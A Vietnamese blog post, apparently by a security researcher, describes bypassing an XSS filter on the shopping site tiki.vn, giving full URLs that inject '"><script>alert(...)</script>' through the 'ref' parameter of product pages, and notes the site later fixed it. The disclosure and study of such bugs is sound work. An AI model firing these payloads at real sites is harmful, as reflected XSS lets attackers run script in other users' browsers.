Sau khi nhận được email thông báo lỗi XSS của tôi, Tiki có sửa lỗi nhưng hiện tại lỗi XSS trên Tiki vẫn có thể vượt qua bộ lọc để khai thác tiếp. Đây là chi tiết cách tôi đã Bypass XSS filters trên Tiki.
Địa chỉ khai khác lỗi XSS cũ:
|
1 |
http://tiki.vn/o-cung-di-dong-silicon-power-armor-a30-1tb-p99653.html?src=<script>alert('checking')</alert> |
Nếu như theo bài trước, tôi có thể khai thác XSS thông qua địa chỉ như bên trên thì giờ không còn khai thác được nữa. Qua quan sát tôi thấy ngoài sử dụng URL dạng “.html?scr=” thì trên trang web còn dùng thêm một dạng nữa là “.html?ref=” ở đường dẫn sản phẩm nên tôi đã thử khai thác tiếp xem sao.
Demo với sản phẩm này:
|
1 |
http://tiki.vn/the-nho-micro-sd-kingston-32gb-class-10-p131017.html |
Tôi thử chèn code để test XSS theo định dạng thông thường là:
.html?ref=< script >alert(‘Checking’)< /script >
|
1 |
http://tiki.vn/the-nho-micro-sd-kingston-32gb-class-10-p131017.html?ref=<script>alert('Checking')</script> |
Thử chạy địa chỉ trên thì không thấy hiện popup, tôi nghĩ họ có dùng code để lọc các mã độc (XSS filters) nên đã Bypass filters đó bằng cách thêm hai ký tự Closing tag “> để thành dạng:
“><script>alert(‘Checking’)</script>
Vậy đường dẫn khai thác đầy đủ sẽ là:
|
1 |
http://tiki.vn/the-nho-micro-sd-kingston-32gb-class-10-p131017.html?ref="><script>alert('Checking')</script> |
Kết quả đã Bypass thành công và khai thác được lỗi.
—
Update: Tiki.vn đã fix lỗi này sau khi nhận được thông báo.
Recent Comments